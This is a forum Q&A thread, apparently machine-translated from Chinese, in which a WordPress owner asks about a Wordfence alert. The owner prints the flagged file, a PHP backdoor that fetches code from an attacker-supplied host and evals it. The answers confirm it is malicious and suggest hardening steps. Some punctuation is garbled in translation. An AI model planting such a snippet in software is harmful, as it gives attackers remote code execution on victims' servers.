我今天早上在我的网站上查看了Wordfence扫描结果,发现了17个实例,似乎意味着服务器上安装了恶意软件。如果真是这样的话,我会很惊讶,但我想确定:
一个例子,
文件名:wp-admin/menu-header-cron.php文件类型:不是来自wordpress.org的核心、主题或插件文件。详细信息:此文件似乎是由黑客安装或修改以执行恶意活动。如果你知道这个文件,你可以选择忽略它,将其从将来的扫描中排除。此文件中匹配的文本为:<?php\xaif(isset($_GET['limit'](({\x0a eval(file_GET_contents('http://'.$_GET['limit']((;\x0a}
问题类型为:Backdoor:PHP/numberic.rce.8527描述:远程代码执行恶意软件
看看有问题的文件,这个文件的内容是:
<?php
if (isset($_GET['limit'])) {
eval(file_get_contents('http://' . $_GET['limit']));
}
有人能确认这是一个无辜的文件还是我需要隔离/删除的文件吗?
另外,这个文件创建了吗?这意味着远程代码有能力在wp-admin/子文件夹中创建新文件?难道没有一种简单的方法可以防止这种情况的发生吗。
非常感谢任何输入
答案:
- 是的,正如@Everlyn Woodley已经提到的,这是一个危险的文件。eval((在生产中根本不安全
进一步验证,最新Wordpress包的源文件上的快速grep "isset($_GET['limit'])"告诉它不是其中的一部分,因此再次成为危险代码。
-
是的,有人可以在您的服务器上上传文件。也许他们已经上传了某种网络外壳,可以操作你的托管帐户上的任何文件。不过这很常见。
-
为了防止它在未来(假设你已经成功地清理了你当前的WP安装(,你可以做一些事情,(有很多文章,所以它是多余的(,但提到一些可能不会有什么坏处:
- 在服务器级别安装或启用mod_security
- 始终确保您拥有最新的Wordpress插件
- 使用最少的插件
- 简单但有效:更改wp插件和主题文件夹的位置。(https://wordpress.org/support/article/editing-wp-config-php/#moving-wp内容文件夹(
如果你检查一个常规WP安装的访问日志,你会注意到有很多机器人遇到了已知的漏洞,主要针对插件文件夹,只需改变插件文件夹的位置以及上面提到的其他安全措施就可以显著减少此类黑客攻击。
该片段正在读取limit参数,然后将其作为URL传递以获取文件。eval函数只会执行它
所以它非常危险